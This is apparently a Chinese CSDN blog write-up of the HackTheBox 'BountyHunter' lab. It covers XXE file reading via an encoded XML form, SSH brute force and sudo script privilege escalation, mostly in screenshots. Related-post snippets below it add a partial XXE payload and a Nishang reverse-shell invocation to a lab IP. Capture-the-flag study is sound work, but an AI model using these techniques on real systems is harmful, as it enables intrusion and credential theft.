hackthebox --BountyHunter

最新推荐文章于 2024-08-06 18:00:09 发布
最新推荐文章于 2024-08-06 18:00:09 发布
阅读量520 收藏
点赞数
分类专栏: hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47156475/article/details/119672224
版权

文章目录

一、信息收集

先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录
于是扩大目录的扫描范围 :
在这里插入图片描述
发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下:
在这里插入图片描述
db.php访问没有任何信息
于是老老实实地去80端口访问
到处点点点,然后发现了一个提交页面
在这里插入图片描述
抓包分析一下
在这里插入图片描述
data里面的数据是先base64加密,然后在url加密的,所以解密后的结果如下:
在这里插入图片描述
尝试修改xml的实体,看看能不能访问/etc/passwd文件,修改后的结果如下:
在这里插入图片描述
然后base64加密,再url加密,然后再重放包
在这里插入图片描述
成功访问passwd,把返回的数据保存在一个文件,并且取名叫passwd,待会要用
现在尝试访问db.php文件,修改脚本如下:
在这里插入图片描述
在这里插入图片描述
重放包
在这里插入图片描述
解密返回的数据
在这里插入图片描述
得到一个账号密码

二、getshell

尝试用得到的账号密码连接ssh
在这里插入图片描述
连接失败,于是用passwd里面的账号尝试爆破
使用命令:cut -d : -f 1 passwd >user
得到一个新的文件,用这个uesr文件里面的用户名去爆破ssh
user文件里面的内容如下:
在这里插入图片描述
现在开始爆破
在这里插入图片描述
成功找到登录的账号,密码
连接ssh
在这里插入图片描述
在这里插入图片描述
成功获取普通用户权限

三、提权

sudo一下,看看是否有什么可以提取权限的方法,并且查看一下可以提权的文件
在这里插入图片描述
经过代码审计,发现可以构造一个脚本,提取权限
在/home/development目录下有一个ticket.md,我们可以修改这个脚本如下:
在这里插入图片描述
然后使用sudo运行这个脚本,即可返回root用户的连接
在这里插入图片描述
在这里插入图片描述
成功获取root权限,并且获得root.txt的内容
在这里插入图片描述
至此,成功完成这台机器!

总结

声明:hackthebox系列的文章,均是本人根据真实做题经历,并参考国内或国外文章制作而成,如有冒犯之处,请联系我进行修改

hackthebox-Bounty (考点:上传/IIS7.5安全/windows)
冬萍子癸水
04-16 526
nmap 就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点 因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名 扫出 打开看第一个是上传,然后在第二个里读取 经验证,随便传图片,读取成功。那么突破思路就是上传了。 但我试了很多php和aspx,都没用,让人郁闷 只好搜iis7.5 rce up...
Hackthebox:Bounty Walkthrough(not use metasploit)
汗的博客
12-18 439
Bounty是一台Hackthebox的windows靶机,难度3.4
HackTheBox-BountyHunter WP
h1nt的博客
09-07 608
0x01 信息收集. 端口信息 目录扫描 0x02 打靶 一通乱点后来到一个后台地址: 提交后在burp中能够发现网站和后台通信的数据: 进行URL解码和BASE64解码后发现是xml: 于是可以试试XXE,首先读取文件: 成功了,接下来可以试试读取别的文件: 但是该读什么文件呢,在之前的扫描目录可以发现db.php,于是尝试读取db.php: <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENT
HackTheBox::BountyHunter
aya3t的博客
10-24 443
HackTheBox::BountyHunter
Hack the box靶机 Bounty
菜浪马废的博客
06-03 567
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
HackTheBox-BountyHunter靶场通关记录
weixin_43876438的博客
10-26 3018
文章目录HackTheBox-BountyHunter靶场准备工作信息搜集漏洞利用提权 HackTheBox-BountyHunter靶场 准备工作 打开hackthebox并找到bountyhunter靶场,关注并获取到IP地址 在hackthebox中下载vpn Kali虚拟机,并运行指定的vpn 信息搜集 我拿到的IP地址为:10.10.11.100 使用nmap进行端口扫描,看看开放了哪些端口。sudo nmap -Pn -sS -p- 10.10.11.100 可以看到开放了22端
BountyHunter:第一人称射击
02-26
10. **版本控制**:文件名中出现的"BountyHunter-master"可能表明项目使用了Git进行版本控制,这是一种广泛使用的分布式版本控制系统,有助于团队协作和代码管理。 综上所述,"BountyHunter"项目涵盖了C++编程、...
BountyHunter_GAME:CRE311的游戏存储库
02-12
【标题】"BountyHunter_GAME:CRE311的游戏存储库"揭示了这是一款由CRE311开发的游戏项目,其源代码或资源被存储在名为"BountyHunter_GAME"的仓库中。通常,这种类型的存储库是开源或者用于教学目的,以便其他开发者...
bountyhunter:用Dart编写的搜索引擎,可在浏览器或服务器上执行
05-11
赏金猎人 非结构化文档的全文本搜索引擎。 它基于反向索引。 使用简单 首先创建实例 Cargo storage = new Cargo(MODE: CargoMode.MEMORY); 构造一个Hunter实例。 Hunter hunter = new Hunter( cargo );...
avastars-bounty-hunter:Avastars的赏金猎人工具
05-13
s.src = "https://cdn.jsdelivr.net/gh/kaigani/avastars-bounty-hunter@a0f0fd5115a14c772052027bccdf9334567f2379/_bountyHunter_app.min.js";document.head.appendChild(s)})() 打开 页面完全加载后,单击小书签
bountyhunter: Dart开发的全功能搜索引擎框架
最后,压缩包子文件的文件名称“bountyhunter-master”表明了这是一个版本控制仓库的主分支。文件夹名称通常包含了项目的名称(bountyhunter)以及当前仓库的状态(master),意指这是仓库的主干代码,通常包含项目...
Hack The Box-Resource
最新发布
m0_52742680的博客
08-06 2491
HackTheBox S6赛季靶场第一篇
推荐一款超棒的抓包分析工具 - Burp Suite
AirPython的博客
06-06 3894
大家好,我是安果!本篇文章我们聊聊一款超级好用的抓包分析工具,即:Burp SuiteBurp Suite,简称 BP 工具,一般作为渗透测试工具,是一款用于攻击 Web 应用程序的集成平台主要功能模块包含:Proxy 模块抓包、数据拦截及数据包修改Target 模块Site map 站点记录及分析Intruder 模块暴力破解Repeater 模块重放工具Decoder...
第二课,从bp(Burp suite)抓包开始
weixin_40114827的博客
12-23 4161
Burp suite抓包
Bp抓包HTTP响应报文
weixin_55710577的博客
06-05 2435
Bp 抓包HTTP响应头
burpsuit抓包
m0_73721944的博客
04-05 5039
我们所说的bp抓包也就是图中的抓包工具,当服务器响应时,即手机与服务器对话时我们可以抓包获取信息,当然也可以对获取的信息进行更改后再发送到手机客户端。首先建立并连接相同的端口,打开burpsuit建立新的端口,要一个没有开放的,也就是不被占用的端口,我们用8081示例。第二种是用自己电脑的代理设置相同的端口,相同的操作可以抓到电脑的信息。改为手动配置代理,端口改为刚刚在burpsuit设置的端口。打开Firefox中的设置,搜索连接设置后进入修改。2.bp抓包的三种形式。1.什么是bp抓包?
BurpSuite修改返回数据
浪子燕青的博客
02-23 7566
BurpSuite修改返回数据 再拦截页面的设置选项中勾选拦截服务段数据 ] 访问博客 拦截页面右键选择拦截返回消息 然后forward发送 这里是服务返回的数据,还没有传递到浏览器,可以在这里修改数据 然后在此forward发送 这里的数据就修改好了 顺便提一点burp怎么设置拦截名单,比如不拦截google,firefox站点请求 在这里设置即可 firefox\.com$ firefox\.com\.cn$ mozilla\.com$ mozilla\.net$ mozilla\.org$
Burp Suite修改响应包字段
热门推荐
stybill的博客
10-14 5万+
抓到包之后 设置Action:do intercept -> response to this request 点击Forward即可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值